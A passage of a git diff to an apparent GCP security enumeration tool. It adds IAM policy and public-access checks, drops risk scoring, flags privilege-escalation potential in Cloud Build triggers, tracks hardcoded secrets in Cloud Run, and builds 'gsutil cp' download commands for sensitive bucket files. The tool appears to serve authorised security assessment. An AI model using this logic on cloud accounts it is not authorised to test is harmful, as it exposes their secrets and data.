ApplicationEndpoint string `json:"applicationEndpoint"` - Connectors []string `json:"connectors"` - Gateway string `json:"gateway"` - CreateTime string `json:"createTime"` - UpdateTime string `json:"updateTime"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` } // ListAppConnectors retrieves all BeyondCorp app connectors @@ -76,6 +84,24 @@ func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorI err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { for _, connector := range page.AppConnectors { info := s.parseAppConnector(connector, projectID) + + // Get IAM policy for this connector + iamPolicy, iamErr := service.Projects.Locations.AppConnectors.GetIamPolicy(connector.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + connectors = append(connectors, info) } return nil @@ -109,6 +135,24 @@ func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectio err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { for _, conn := range page.AppConnections { info := s.parseAppConnection(conn, projectID) + + // Get IAM policy for this connection + iamPolicy, iamErr := service.Projects.Locations.AppConnections.GetIamPolicy(conn.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + connections = append(connections, info) } return nil @@ -123,13 +167,13 @@ func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectio func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { info := AppConnectorInfo{ Name: extractName(connector.Name), + FullName: connector.Name, ProjectID: projectID, Location: extractLocation(connector.Name), DisplayName: connector.DisplayName, State: connector.State, CreateTime: connector.CreateTime, UpdateTime: connector.UpdateTime, - RiskReasons: []string{}, } if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { @@ -140,14 +184,13 @@ func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudB info.ResourceInfo = connector.ResourceInfo.Id } - info.RiskLevel, info.RiskReasons = s.analyzeConnectorRisk(info) - return info } func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { info := AppConnectionInfo{ Name: extractName(conn.Name), + FullName: conn.Name, ProjectID: projectID, Location: extractLocation(conn.Name), DisplayName: conn.DisplayName, @@ -155,7 +198,6 @@ func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyon Type: conn.Type, CreateTime: conn.CreateTime, UpdateTime: conn.UpdateTime, - RiskReasons: []string{}, } if conn.ApplicationEndpoint != nil { @@ -170,50 +212,9 @@ func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyon info.Gateway = extractName(conn.Gateway.AppGateway) } - info.RiskLevel, info.RiskReasons = s.analyzeConnectionRisk(info) - return info } -func (s *BeyondCorpService) analyzeConnectorRisk(connector AppConnectorInfo) (string, []string) { - var reasons []string - score := 0 - - if connector.State != "RUNNING" { - reasons = append(reasons, fmt.Sprintf("Connector not running: %s", connector.State)) - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *BeyondCorpService) analyzeConnectionRisk(conn AppConnectionInfo) (string, []string) { - var reasons []string - score := 0 - - // Connection to sensitive ports - if strings.Contains(conn.ApplicationEndpoint, ":22") { - reasons = append(reasons, "Connection to SSH port (22)") - score += 1 - } - if strings.Contains(conn.ApplicationEndpoint, ":3389") { - reasons = append(reasons, "Connection to RDP port (3389)") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullPath string) string { parts := strings.Split(fullPath, "/") if len(parts) > 0 { diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 2e7704d7..8b2db6d8 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -9,6 +9,7 @@ import ( "cloud.google.com/go/bigquery" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + bqapi "google.golang.org/api/bigquery/v2" ) // AccessEntry represents an access control entry on a dataset @@ -79,12 +80,23 @@ type BigqueryTable struct { PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" // View info - IsView bool `json:"isView"` + IsView bool `json:"isView"` ViewQuery string `json:"viewQuery"` - UseLegacySQL bool `json:"useLegacySQL"` + UseLegacySQL bool `json:"useLegacySQL"` // Streaming info HasStreamingBuffer bool `json:"hasStreamingBuffer"` + + // IAM bindings (table-level) + IAMBindings []TableIAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` + PublicAccess string `json:"publicAccess"` +} + +// TableIAMBinding represents an IAM binding on a table +type TableIAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -302,6 +314,18 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ } defer client.Close() + // Create API service for IAM calls + var apiService *bqapi.Service + if bq.session != nil { + apiService, err = bqapi.NewService(ctx, bq.session.GetClientOption()) + } else { + apiService, err = bqapi.NewService(ctx) + } + if err != nil { + // Continue without IAM if service creation fails + apiService = nil + } + var tables []BigqueryTable ds := client.Dataset(datasetID) it := ds.Tables(ctx) @@ -365,11 +389,66 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ tbl.HasStreamingBuffer = true } + // Get table-level IAM policy + if apiService != nil { + iamBindings, isPublic, publicAccess := bq.getTableIAMPolicy(ctx, apiService, projectID, datasetID, table.TableID) + tbl.IAMBindings = iamBindings + tbl.IsPublic = isPublic + tbl.PublicAccess = publicAccess + } + tables = append(tables, tbl) } return tables, nil } +// getTableIAMPolicy retrieves IAM policy for a specific table +func (bq *BigQueryService) getTableIAMPolicy(ctx context.Context, apiService *bqapi.Service, projectID, datasetID, tableID string) ([]TableIAMBinding, bool, string) { + var bindings []TableIAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + resource := fmt.Sprintf("projects/%s/datasets/%s/tables/%s", projectID, datasetID, tableID) + policy, err := apiService.Tables.GetIamPolicy(resource, &bqapi.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // IAM not available or permission denied - return empty + return bindings, false, "None" + } + + for _, binding := range policy.Bindings { + iamBinding := TableIAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // tableTypeToString converts BigQuery TableType to a readable string func tableTypeToString(tt bigquery.TableType) string { switch tt { diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go index a413ad2f..6bd4e6fe 100644 --- a/gcp/services/bigtableService/bigtableService.go +++ b/gcp/services/bigtableService/bigtableService.go @@ -18,13 +18,29 @@ func New() *BigtableService { } type BigtableInstanceInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - DisplayName string `json:"displayName"` - Type string `json:"type"` - State string `json:"state"` - Tables []string `json:"tables"` - Clusters []ClusterInfo `json:"clusters"` + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Clusters []ClusterInfo `json:"clusters"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type BigtableTableInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + InstanceName string `json:"instanceName"` + ProjectID string `json:"projectId"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } type ClusterInfo struct { @@ -34,14 +50,23 @@ type ClusterInfo struct { State string `json:"state"` } -func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInfo, error) { +type BigtableResult struct { + Instances []BigtableInstanceInfo + Tables []BigtableTableInfo +} + +func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { ctx := context.Background() service, err := bigtableadmin.NewService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") } - var instances []BigtableInstanceInfo + result := &BigtableResult{ + Instances: []BigtableInstanceInfo{}, + Tables: []BigtableTableInfo{}, + } + parent := fmt.Sprintf("projects/%s", projectID) resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() @@ -52,6 +77,7 @@ func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInf for _, instance := range resp.Instances { info := BigtableInstanceInfo{ Name: extractName(instance.Name), + FullName: instance.Name, ProjectID: projectID, DisplayName: instance.DisplayName, Type: instance.Type, @@ -71,18 +97,49 @@ func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInf } } - // Get tables + // Get tables and their IAM policies tablesResp, _ := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() if tablesResp != nil { for _, table := range tablesResp.Tables { - info.Tables = append(info.Tables, extractName(table.Name)) + tableInfo := BigtableTableInfo{ + Name: extractName(table.Name), + FullName: table.Name, + InstanceName: info.Name, + ProjectID: projectID, + } + + // Get IAM policy for table + tableIamResp, err := service.Projects.Instances.Tables.GetIamPolicy(table.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && tableIamResp != nil { + for _, binding := range tableIamResp.Bindings { + tableInfo.IAMBindings = append(tableInfo.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + tableInfo.PublicAccess = checkPublicAccess(tableIamResp.Bindings) + } + + result.Tables = append(result.Tables, tableInfo) } } - instances = append(instances, info) + // Get IAM policy for instance + iamResp, err := service.Projects.Instances.GetIamPolicy(instance.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && iamResp != nil { + for _, binding := range iamResp.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + info.PublicAccess = checkPublicAccess(iamResp.Bindings) + } + + result.Instances = append(result.Instances, info) } - return instances, nil + return result, nil } func extractName(fullName string) string { @@ -92,3 +149,15 @@ func extractName(fullName string) string { } return fullName } + +// checkPublicAccess checks if any IAM binding grants access to allUsers or allAuthenticatedUsers +func checkPublicAccess(bindings []*bigtableadmin.Binding) bool { + for _, binding := range bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return true + } + } + } + return false +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index a737988b..c9f5e02b 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -36,6 +36,7 @@ type SensitiveFileInfo struct { DownloadCmd string `json:"downloadCmd"` // gsutil command to download Updated string `json:"updated"` StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` // Whether the object has public access } // SensitivePatterns defines patterns to search for sensitive files @@ -191,6 +192,9 @@ func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketNa continue } + // Check if object has public access via ACLs + isPublic := s.isObjectPublic(obj) + return &SensitiveFileInfo{ BucketName: bucketName, ObjectName: obj.Name, @@ -203,6 +207,7 @@ func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketNa DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), Updated: obj.Updated, StorageClass: obj.StorageClass, + IsPublic: isPublic, } } } @@ -210,6 +215,22 @@ func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketNa return nil } +// isObjectPublic checks if an object has public access via ACLs +func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { + if obj == nil || obj.Acl == nil { + return false + } + + for _, acl := range obj.Acl { + // Check for public access entities + if acl.Entity == "allUsers" || acl.Entity == "allAuthenticatedUsers" { + return true + } + } + + return false +} + func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { nameLower := strings.ToLower(objectName) diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go index 5cc3f034..0286aa00 100644 --- a/gcp/services/certManagerService/certManagerService.go +++ b/gcp/services/certManagerService/certManagerService.go @@ -29,8 +29,9 @@ type Certificate struct { State string `json:"state"` IssuanceState string `json:"issuanceState"` AttachedTo []string `json:"attachedTo"` // LBs or other resources - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` } // SSLCertificate represents a compute SSL certificate (classic) @@ -42,8 +43,9 @@ type SSLCertificate struct { ExpireTime string `json:"expireTime"` DaysUntilExpiry int `json:"daysUntilExpiry"` CreationTime string `json:"creationTime"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` } // CertificateMap represents a Certificate Manager certificate map @@ -53,8 +55,6 @@ type CertificateMap struct { Location string `json:"location"` EntryCount int `json:"entryCount"` Certificates []string `json:"certificates"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // GetCertificates retrieves Certificate Manager certificates @@ -79,11 +79,10 @@ func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, e for _, cert := range resp.Certificates { c := Certificate{ - Name: extractNameFromPath(cert.Name), - ProjectID: projectID, - Location: location, - Domains: cert.SanDnsnames, - RiskReasons: []string{}, + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, } // Determine type and state @@ -94,6 +93,7 @@ func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, e } else if cert.SelfManaged != nil { c.Type = "SELF_MANAGED" c.State = "ACTIVE" // Self-managed certs are active if they exist + c.SelfManaged = true } // Parse expiration @@ -102,11 +102,17 @@ func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, e expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) if err == nil { c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 } } - // Analyze risk - c.RiskLevel, c.RiskReasons = s.analyzeCertRisk(c) + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } certificates = append(certificates, c) } @@ -137,7 +143,7 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific ProjectID: projectID, Type: cert.Type, CreationTime: cert.CreationTimestamp, - RiskReasons: []string{}, + SelfManaged: cert.Type == "SELF_MANAGED", } // Get domains from managed certificate @@ -151,11 +157,17 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) if err == nil { c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 } } - // Analyze risk - c.RiskLevel, c.RiskReasons = s.analyzeSSLCertRisk(c) + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } certificates = append(certificates, c) } @@ -175,7 +187,7 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific ProjectID: projectID, Type: cert.Type, CreationTime: cert.CreationTimestamp, - RiskReasons: []string{}, + SelfManaged: cert.Type == "SELF_MANAGED", } if cert.Managed != nil { @@ -187,10 +199,18 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) if err == nil { c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break } } - c.RiskLevel, c.RiskReasons = s.analyzeSSLCertRisk(c) certificates = append(certificates, c) } } @@ -220,10 +240,9 @@ func (s *CertManagerService) GetCertificateMaps(projectID string) ([]Certificate for _, certMap := range resp.CertificateMaps { cm := CertificateMap{ - Name: extractNameFromPath(certMap.Name), - ProjectID: projectID, - Location: location, - RiskReasons: []string{}, + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, } // Get entries for this map @@ -237,7 +256,6 @@ func (s *CertManagerService) GetCertificateMaps(projectID string) ([]Certificate } } - cm.RiskLevel, cm.RiskReasons = s.analyzeMapRisk(cm) maps = append(maps, cm) } } @@ -245,108 +263,6 @@ func (s *CertManagerService) GetCertificateMaps(projectID string) ([]Certificate return maps, nil } -func (s *CertManagerService) analyzeCertRisk(cert Certificate) (string, []string) { - var reasons []string - score := 0 - - // Check expiration - if cert.DaysUntilExpiry < 0 { - reasons = append(reasons, "Certificate has EXPIRED!") - score += 3 - } else if cert.DaysUntilExpiry <= 7 { - reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s) - CRITICAL", cert.DaysUntilExpiry)) - score += 2 - } else if cert.DaysUntilExpiry <= 30 { - reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s)", cert.DaysUntilExpiry)) - score += 1 - } - - // Check state - if cert.State == "FAILED" { - reasons = append(reasons, "Certificate in FAILED state") - score += 2 - } - - // Check issuance state for managed certs - if cert.Type == "GOOGLE_MANAGED" && cert.IssuanceState != "ACTIVE" { - reasons = append(reasons, fmt.Sprintf("Managed certificate issuance state: %s", cert.IssuanceState)) - score += 1 - } - - // Self-managed certs need more attention - if cert.Type == "SELF_MANAGED" { - reasons = append(reasons, "Self-managed certificate requires manual renewal") - } - - // Check for wildcard domains (can be abused if key is compromised) - for _, domain := range cert.Domains { - if strings.HasPrefix(domain, "*") { - reasons = append(reasons, fmt.Sprintf("Wildcard certificate: %s", domain)) - break - } - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *CertManagerService) analyzeSSLCertRisk(cert SSLCertificate) (string, []string) { - var reasons []string - score := 0 - - // Check expiration - if cert.DaysUntilExpiry < 0 { - reasons = append(reasons, "Certificate has EXPIRED!") - score += 3 - } else if cert.DaysUntilExpiry <= 7 { - reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s) - CRITICAL", cert.DaysUntilExpiry)) - score += 2 - } else if cert.DaysUntilExpiry <= 30 { - reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s)", cert.DaysUntilExpiry)) - score += 1 - } - - // Self-managed needs more attention - if cert.Type == "SELF_MANAGED" { - reasons = append(reasons, "Self-managed certificate requires manual renewal") - } - - // Check for wildcard - for _, domain := range cert.Domains { - if strings.HasPrefix(domain, "*") { - reasons = append(reasons, fmt.Sprintf("Wildcard certificate: %s", domain)) - break - } - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *CertManagerService) analyzeMapRisk(certMap CertificateMap) (string, []string) { - var reasons []string - - if certMap.EntryCount == 0 { - reasons = append(reasons, "Certificate map has no entries") - return "LOW", reasons - } - - reasons = append(reasons, fmt.Sprintf("Has %d certificate(s)", len(certMap.Certificates))) - return "INFO", reasons -} - func extractNameFromPath(path string) string { parts := strings.Split(path, "/") if len(parts) > 0 { diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go index 9f4adb75..473d8fc9 100644 --- a/gcp/services/cloudArmorService/cloudArmorService.go +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -17,18 +17,16 @@ func New() *CloudArmorService { // SecurityPolicy represents a Cloud Armor security policy type SecurityPolicy struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Description string `json:"description"` - Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK - RuleCount int `json:"ruleCount"` - Rules []SecurityRule `json:"rules"` - AdaptiveProtection bool `json:"adaptiveProtection"` - DDOSProtection string `json:"ddosProtection"` - AttachedResources []string `json:"attachedResources"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - Weaknesses []string `json:"weaknesses"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + Weaknesses []string `json:"weaknesses"` } // SecurityRule represents a rule within a security policy @@ -73,7 +71,6 @@ func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPol RuleCount: len(policy.Rules), Rules: []SecurityRule{}, AttachedResources: []string{}, - RiskReasons: []string{}, Weaknesses: []string{}, } @@ -129,7 +126,7 @@ func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPol sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) // Analyze for weaknesses - sp.RiskLevel, sp.RiskReasons, sp.Weaknesses = s.analyzePolicy(sp) + sp.Weaknesses = s.analyzePolicy(sp) policies = append(policies, sp) } @@ -155,17 +152,12 @@ func (s *CloudArmorService) findAttachedResources(ctx context.Context, service * } // analyzePolicy checks for security weaknesses in the policy -func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) (string, []string, []string) { - var reasons []string +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { var weaknesses []string - score := 0 // Check if policy is attached to anything if len(policy.AttachedResources) == 0 { - weaknesses = append(weaknesses, "Policy not attached to any backend service - not protecting anything") - score += 1 - } else { - reasons = append(reasons, fmt.Sprintf("Protecting %d resource(s)", len(policy.AttachedResources))) + weaknesses = append(weaknesses, "Policy not attached to any backend service") } // Check for overly permissive rules @@ -186,79 +178,44 @@ func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) (string, []stri } // Check for allow rules that match all IPs if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || - strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { allowAllIPsCount++ } } if hasDefaultAllow && !hasDenyRules { - weaknesses = append(weaknesses, "Default allow rule with no deny rules - policy does nothing useful") - score += 2 + weaknesses = append(weaknesses, "Default allow rule with no deny rules") } if previewOnlyCount > 0 { - weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode - not actively blocking", previewOnlyCount)) - score += 1 + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode", previewOnlyCount)) } if allowAllIPsCount > 0 && !hasDenyRules { - weaknesses = append(weaknesses, "Has allow-all rules without deny rules - effectively no protection") - score += 2 + weaknesses = append(weaknesses, "Has allow-all rules without deny rules") } // Check adaptive protection if !policy.AdaptiveProtection { - weaknesses = append(weaknesses, "Adaptive protection not enabled - reduced DDoS defense") - score += 1 - } else { - reasons = append(reasons, "Adaptive protection enabled") + weaknesses = append(weaknesses, "Adaptive protection not enabled") } - // Check for common WAF bypass patterns + // Check for common WAF rules hasOWASPRules := false - hasGeoRules := false - hasBotRules := false - for _, rule := range policy.Rules { matchLower := strings.ToLower(rule.Match) if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || - strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { hasOWASPRules = true - } - if strings.Contains(matchLower, "origin.region_code") { - hasGeoRules = true - } - if strings.Contains(matchLower, "request.headers") && - (strings.Contains(matchLower, "user-agent") || strings.Contains(matchLower, "bot")) { - hasBotRules = true + break } } if !hasOWASPRules { - weaknesses = append(weaknesses, "No OWASP/WAF rules detected (SQLi, XSS, RCE, LFI)") - } - - if len(policy.Rules) > 0 { - reasons = append(reasons, fmt.Sprintf("Has %d rule(s)", len(policy.Rules))) + weaknesses = append(weaknesses, "No OWASP/WAF rules detected") } - if hasGeoRules { - reasons = append(reasons, "Has geo-blocking rules") - } - - if hasBotRules { - reasons = append(reasons, "Has bot protection rules") - } - - // Determine risk level based on weaknesses - if score >= 4 { - return "HIGH", reasons, weaknesses - } else if score >= 2 { - return "MEDIUM", reasons, weaknesses - } else if score >= 1 { - return "LOW", reasons, weaknesses - } - return "INFO", reasons, weaknesses + return weaknesses } // GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go index 2eeddef4..784357b0 100644 --- a/gcp/services/cloudbuildService/cloudbuildService.go +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -44,10 +44,9 @@ type TriggerInfo struct { Substitutions map[string]string `json:"substitutions"` // Security analysis - IsPublicRepo bool `json:"isPublicRepo"` - HasSecrets bool `json:"hasSecrets"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + PrivescPotential bool `json:"privescPotential"` } // BuildInfo represents a Cloud Build execution @@ -292,7 +291,6 @@ func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, proje Disabled: trigger.Disabled, CreateTime: trigger.CreateTime, Substitutions: trigger.Substitutions, - RiskReasons: []string{}, } // Parse source configuration @@ -334,8 +332,14 @@ func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, proje } } - // Security analysis - info.RiskLevel, info.RiskReasons = s.analyzeTriggerRisk(info) + // Determine privesc potential + // Default SA is often over-privileged, GitHub triggers can execute untrusted code + if info.ServiceAccount == "" { + info.PrivescPotential = true + } + if info.SourceType == "github" && info.BranchName != "" { + info.PrivescPotential = true + } return info } @@ -355,42 +359,3 @@ func containsIgnoreCase(s, substr string) bool { return len(s) >= len(substr) && (s == substr || len(s) > len(substr) && (s[:len(substr)] == substr || s[len(s)-len(substr):] == substr)) } - -// analyzeTriggerRisk determines the risk level of a trigger -func (s *CloudBuildService) analyzeTriggerRisk(trigger TriggerInfo) (string, []string) { - var reasons []string - score := 0 - - // Public repo triggers could be exploited - if trigger.SourceType == "github" && trigger.IsPublicRepo { - reasons = append(reasons, "Triggers from public GitHub repository") - score += 2 - } - - // Inline build configs might contain sensitive info - if trigger.BuildConfigType == "inline" { - reasons = append(reasons, "Uses inline build configuration") - score += 1 - } - - // Pull request triggers could be exploited by external PRs - if trigger.BranchName != "" && trigger.SourceType == "github" { - reasons = append(reasons, "PR-triggered builds may execute untrusted code") - score += 1 - } - - // No specific service account means using default (often over-privileged) - if trigger.ServiceAccount == "" { - reasons = append(reasons, "Uses default Cloud Build service account") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index 58cd821e..068e9cef 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -52,11 +52,44 @@ type ServiceInfo struct { SecretEnvVarCount int SecretVolumeCount int + // Security analysis + HardcodedSecrets []HardcodedSecret // Potential secrets in env vars (not using Secret Manager) + UsesDefaultSA bool // Uses default compute service account + + // Detailed env var and secret info + EnvVars []EnvVarInfo // All environment variables + SecretRefs []SecretRefInfo // All Secret Manager references + // IAM InvokerMembers []string IsPublic bool } +// HardcodedSecret represents a potential secret found in environment variables +type HardcodedSecret struct { + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct", "secret-manager", or "config-map" + // For Secret Manager references + SecretName string + SecretVersion string +} + +// SecretRefInfo represents a Secret Manager reference 